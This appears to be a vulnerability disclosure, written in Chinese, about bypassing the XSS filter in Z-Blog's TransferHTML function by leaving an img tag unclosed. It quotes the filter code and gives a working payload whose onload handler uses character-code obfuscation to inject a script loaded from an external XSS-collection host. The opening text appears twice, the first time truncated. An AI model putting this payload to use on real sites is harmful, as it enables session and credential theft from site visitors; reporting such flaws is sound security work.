VULHUB ™

### 简要描述： 看到你们内测的消息我就屁颠屁颠地跑过来了，花了两个通宵看代码发现几处漏洞.. 这里先绕过了你们XSS过滤脚本.. ### 详细说明： 问题出在 /zb_system/function/c_system_common.php ``` function TransferHTML($source,$para){ if(strpos($para, '[nohtml]')!==false){ $source=preg_replace("/<([^<>]*)>/si","",$source); } if(strpos($para, '[noscript]')!==false){ $source=preg_replace("/<(script.*?)>(.*?)<(script.*?)>/si","",$source); $source=preg_replace("/<(?script.*?)>/si","",$source); $source=preg_replace("/javascript/si","",$source); $source=preg_replace("/vbscript/si","",$source); $source=preg_replace("/on([a-z]+)*=/si","on\=",$source); } if(strpos($para, '[enter]')!==false){ $source=str_replace("","<br/>",$source); $source=str_replace("","<br/>",$source); $source=str_replace("","<br/>",$source); $source=preg_replace("/( )+/", "<br/>", $source); } if(strpos($para, '[noenter]')!==false){ $source=str_replace("","",$source); $source=str_replace("","",$source); $source=str_replace("","",$source); } if(strpos($para, '[filename]')!==false){...

### 简要描述： 看到你们内测的消息我就屁颠屁颠地跑过来了，花了两个通宵看代码发现几处漏洞.. 这里先绕过了你们XSS过滤脚本.. ### 详细说明： 问题出在 /zb_system/function/c_system_common.php ``` function TransferHTML($source,$para){ if(strpos($para, '[nohtml]')!==false){ $source=preg_replace("/<([^<>]*)>/si","",$source); } if(strpos($para, '[noscript]')!==false){ $source=preg_replace("/<(script.*?)>(.*?)<(script.*?)>/si","",$source); $source=preg_replace("/<(?script.*?)>/si","",$source); $source=preg_replace("/javascript/si","",$source); $source=preg_replace("/vbscript/si","",$source); $source=preg_replace("/on([a-z]+)*=/si","on\=",$source); } if(strpos($para, '[enter]')!==false){ $source=str_replace("","<br/>",$source); $source=str_replace("","<br/>",$source); $source=str_replace("","<br/>",$source); $source=preg_replace("/( )+/", "<br/>", $source); } if(strpos($para, '[noenter]')!==false){ $source=str_replace("","",$source); $source=str_replace("","",$source); $source=str_replace("","",$source); } if(strpos($para, '[filename]')!==false){ $source=str_replace(array("/","#","$","\",":","?","*","","<",">","|"," "),array(""),$source); } if(strpos($para, '[normalname]')!==false){ $source=str_replace(array("#","$","(",")","*","+","[","]","{","}","?","\","^","|",":","'","",";","@","~","=","%","&"),array(""),$source); } return $source; } ``` XSS过滤函数，看上去是很安全，可是可是 这个正则有个问题，他判断是XSS成立的条件是<>两个存在script,javascript,vbscript.onxxxx…but…开发似乎不知道，img标签是可以不闭合<>,浏览器会帮你闭合的这个特性，更多详情 请看http://drops.wooyun.org/tips/147 插入XSS代码 ``` <img/src=http://www.baidu.com/img/baidu_sylogo1.gif onload=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,105,120,115,115,46,105,110,47,47,122,83,106,109,68,65,63,49,51,55,57,57,57,50,51,55,57);document.body.appendChild(window.s)})() ``` 不闭合img标签，成功绕过 [<img src="https://images.seebug.org/upload/201309/24112122c6beb3b444ea99b76fe3f6acfe3e712f.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/24112122c6beb3b444ea99b76fe3f6acfe3e712f.jpg) [<img src="https://images.seebug.org/upload/201309/24112231b1c7c37f74d431ad305cfcc135971270.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/24112231b1c7c37f74d431ad305cfcc135971270.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201309/24112122c6beb3b444ea99b76fe3f6acfe3e712f.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/24112122c6beb3b444ea99b76fe3f6acfe3e712f.jpg) [<img src="https://images.seebug.org/upload/201309/24112231b1c7c37f74d431ad305cfcc135971270.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/24112231b1c7c37f74d431ad305cfcc135971270.jpg)